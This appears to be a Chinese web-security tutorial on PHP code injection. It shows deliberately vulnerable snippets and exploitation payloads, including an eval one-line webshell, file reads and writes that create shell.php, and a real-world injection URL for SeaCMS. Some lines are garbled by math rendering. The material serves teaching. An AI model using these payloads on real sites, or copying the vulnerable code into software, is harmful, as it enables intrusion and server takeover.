一、原理以及成因

php 代码执行(注入)是指应用程序过滤不严,用户可以 http 通过请求将代码注入到应用中执行。
代码执行(注入)类似于 SQL 注入漏洞,SQLi 是将 SQL 语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个 Web 后门的存在。
1、程序中含有可以执行 PHP 代码的函数或者语言结构
2、传入第一点中的参数,客户端可控,直接修改或者影响

二、漏洞危害

Web 应用如果存在代码执行漏洞是一件非常可怕的事情,就像一个人没有穿衣服,赤裸裸的暴露在光天化日之下。可以通过代码执行漏洞继承 Web 用户权限,执行任意代码。如果服务器没有正确的配置,Web 用户权限比较高的话,我们可以读写目标服务器任意文件内容,甚至可控制整个网站以及服务器。
本课程以 PHP 为例子来说明,代码执行漏洞。
PHP 中有很多函数和语句都会造成 PHP 代码执行漏洞。

三、相关函数和语句

3.1 eval()

eval() 会将字符串当作 PHP 代码来执行。测试代码如下

<?php if(isset($_REQUEST['code'])){ @$str=$_REQUEST['code']; eval($str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}
<?php if(isset($_GET['code'])){ @$str=$_GET['code']; eval($str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

提交变量[?code=phpinfo();] 我们提交以下参数也是可以的[?code=${phpinfo()};]
[?code=1;phpinfo();] //可以执行多条语句

3.2 assert()
assert() 同样会作为 PHP 代码执行测试代码如下

<?php if(isset($_GET['code'])){ @$str=$_GET['code']; assert($str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

提交参数 [?code=phpinfo()]

3.3 preg_replace()

preg_replace() 函数作用是对字符串进行正则处理,参数和返回值如下
mixed preg_replace(mixed $pattern,mixed $replacement,mixed KaTeX parse error: Expected 'EOF', got '&' at position 30: …imit = -1[,int &̲count]])
这段代码的含义是搜索subject中匹配subject 中匹配subject中匹配pattern 的部分,以$replacement 进行替换,而
pattern处,及第一个参数存在e修饰时,pattern 处,及第一个参数存在 e 修饰时,pattern处,及第一个参数存在e修饰时,replacement 的值会被当成 PHP 代码来执行。典型的代码如下

<?php if(isset($_GET['code'])){ @$str=$_GET['code'];
preg_replace('/\[(.*)\]/e','\\1',$str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

提交参数[?code=[phpinfo()]], phpinfo() 会被执行

3.4 call_user_func()

call_user_func() 等函数都有调用其他函数的功能,其中一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用以外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。
以 call_user_func() 为例子,该函数的第一个参数作为回调函数,测试代码如下

<?php if(isset($_GET['fun'])){
$fun=$_GET['fun'];
$para=$_GET['para']; call_user_func($fun,$para);
}
?>

提交参数[?fun=assert&para=phpinfo()]
注意:这里不能使用 eval,因为 eval 是语言结构,不是函数。

3.5 动态函数a(a(a(b)
由于 PHP 的特性原因,PHP 的函数支持直接由拼接的方式调用,这导致 PHP 再安全上的控制又加大了难度。不少知名程序也用到了动态函数的写法,这种写法跟使用 call_user_func() 的初衷一样,用来更加方便的调用函数,但是一旦过滤不严格就会造成代码执行漏洞。
测试代码如下:

<?php if(isset($_GET['a'])){
$a=$_GET['a'];
$b=$_GET['b'];
$a($b);
}

四、漏洞利用

代码执行漏洞的利用方式有很多中

4.1 直接获取shell

提交参数[?code=@eval($_REQUEST[1])],即可构成一句话木马,密码为 1。可以使用菜刀或者蚁剑连接

4.2 获取当前文件的绝对路径

FILE 是 PHP 预定义常量,其含义为当前文件的路径。提交代码[?code=print(FILE);]

4.3 读文件
我们可以利用 file_get_contents() 函数读取服务器任意文件,前提是知道文件的绝对路径(也可是相对路径)和读取权限。

提交代码[?code=var_dump(file_get_contents(‘c:\windows\system32\drivers\etc\hosts’));] 右键查看源代码

4.4 写文件

我们可以利用 file_put_contents() 函数写入文件,前提是知道可写文件目录。提交代码[?code=var_dump(file_put_contents(POST[1],_POST[1],P​OST[1],_POST[2]));]
此时需要借助与 hackbar 通过 post 方式提交参数
[1=shel.php&2=<?php phpinfo()?>]
即可再当前目录下创建一个文件 shell.php

五、防御方法

1、尽量不要使用 eval(不是函数,是语言结构) 等函数
2、如果使用的话一定要进行严格的过滤3、preg_replace 放弃使用/e 修饰符
4、修改配置文件 php.ini disable_functions=assert

实战:
海洋 Seacmsv6.26 系统存在代码注入漏洞
漏洞点[/search.php?searchtype=5&tid=&area=phpinfo()]
6.53 6.54 6.55 都存在代码注入漏洞

代码注入(web安全入门)相关推荐

  1. web 漏洞入门之 —— SQL 注入教程

    SQL 注入是最常见.最被人们熟知的 web 漏洞.根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. ...

  2. JAVA WEB快速入门之从编写一个JSP WEB网站了解JSP WEB网站的基本结构、调试、部署...

    接上篇<JAVA WEB快速入门之环境搭建>,在完成了环境搭建后(JDK.Tomcat.IDE),现在是万事具备,就差写代码了,今天就来从编写一个JSP WEB网站了解JSP WEB网站的 ...

  3. java8生成jsp页面内容组装到jsp中_JAVA WEB快速入门之从编写一个JSP WEB网站了解JSP WEB网站的基本结构、调试、部署...

    接上篇<JAVA WEB快速入门之环境搭建>,在完成了环境搭建后(JDK.Tomcat.IDE),现在是万事具备,就差写代码了,今天就来从编写一个JSP WEB网站了解JSP WEB网站的 ...

  4. java web快速入门_Web安全快速入门

    java web快速入门 Web开发人员针对CORS,CSP,HSTS和所有Web安全首字母缩写词的入门知识! (A web developer's primer on CORS, CSP, HSTS ...

  5. Angular和.NET Core Web API入门应用程序

    下载源160.2 KB 您可以在此处查看此项目的源代码和最新更新 这是Angular/.NET Core Web API入门应用程序,具有添加.编辑和删除客户的基本功能,因此您可以将其用作构建应用程序 ...

  6. 干货|Web安全入门基础与思路总结(附思维导图)

    该篇文章主要是写给WEB安全入门者的基础与思路 基础 HTTP协议 网站访问过程 静态页访问 首先用户通过浏览器打开kw0ng.top,此时浏览器会向DNS服务器请求解析,将kw0ng.top转换为I ...

  7. [网络安全学习篇58]:PHP代码注入

    引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...

  8. 网络安全web方向入门题合集

    网络安全web方向入门题合集 [HCTF 2018]WarmUp 验证 [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [强网杯 2019]随便注 前期工作 堆叠注入查 ...

  9. JSP WEB开发入门基础到高手进阶教程002

    JSP WEB开发入门基础到高手进阶教程 -------开发入门 JSP与微软的Active Server Pages 兼容,但它是使用类似HTML的卷标以及Java程序代码段而不是VBScript. ...

最新文章

  1. python开发工程师面试题-一名python web后端开发工程师的面试总结
  2. java的lookAndfeel_java-LookAndFeel行为之间的区别
  3. vue+vuecli+webapck2实现多页面应用
  4. python棋盘格_干货必看 | Python的turtle库之经典棋盘格
  5. vs2008 下编译jrtplib-3.9.0成功
  6. 隐私和网络安全将是未来科技发展的屏障
  7. Android中FTP服务器、客户端搭建以及SwiFTP、ftp4j介绍
  8. Django讲课笔记06:搭建项目开发环境
  9. 中移4G模块-ML302-OpenCpu开发-51单片机串口转I2C
  10. Python的collections模块中namedtuple结构使用示例
  11. SAX EntityResolver 的作用
  12. C++ Primer(第5版)
  13. centos 部署mysql5.7_centos7部署mysql-5.7
  14. db4o_8.0对象数据库官方文档翻译_学习笔记一
  15. c语言做贪吃蛇怎么记住成绩,用C语言编写贪吃蛇的思路是怎样的?
  16. 西安中学2021文科高考成绩查询,2021年西安重点高中名单及排名,西安高中高考成绩排名榜...
  17. 关于seo优化实用篇
  18. ppt将画好的箭头改为直线
  19. 博客披着个人外衣的集体游戏
  20. Istio入坑指南(二) Istio的安装与简单的使用

热门文章

  1. 干货!Android 各大版本的差异(安卓4+版本)
  2. html哪些标签可以用在制作列表中,用HTML列表标签ul、ol和dl制作菜单
  3. C语言OJ 大象喝水
  4. Java中final关键字
  5. ubuntu创建文件的命令
  6. Java服务器性能监控(一) Metrics
  7. 木马下载器盗号数十种 破天木马剑指网游
  8. php setinc,ThinkPHP 数字字段 更新 setInc 与 setDec 方法
  9. 哈佛商学院要求学生必看的20部电影
  10. colab防止掉线断连及清除方法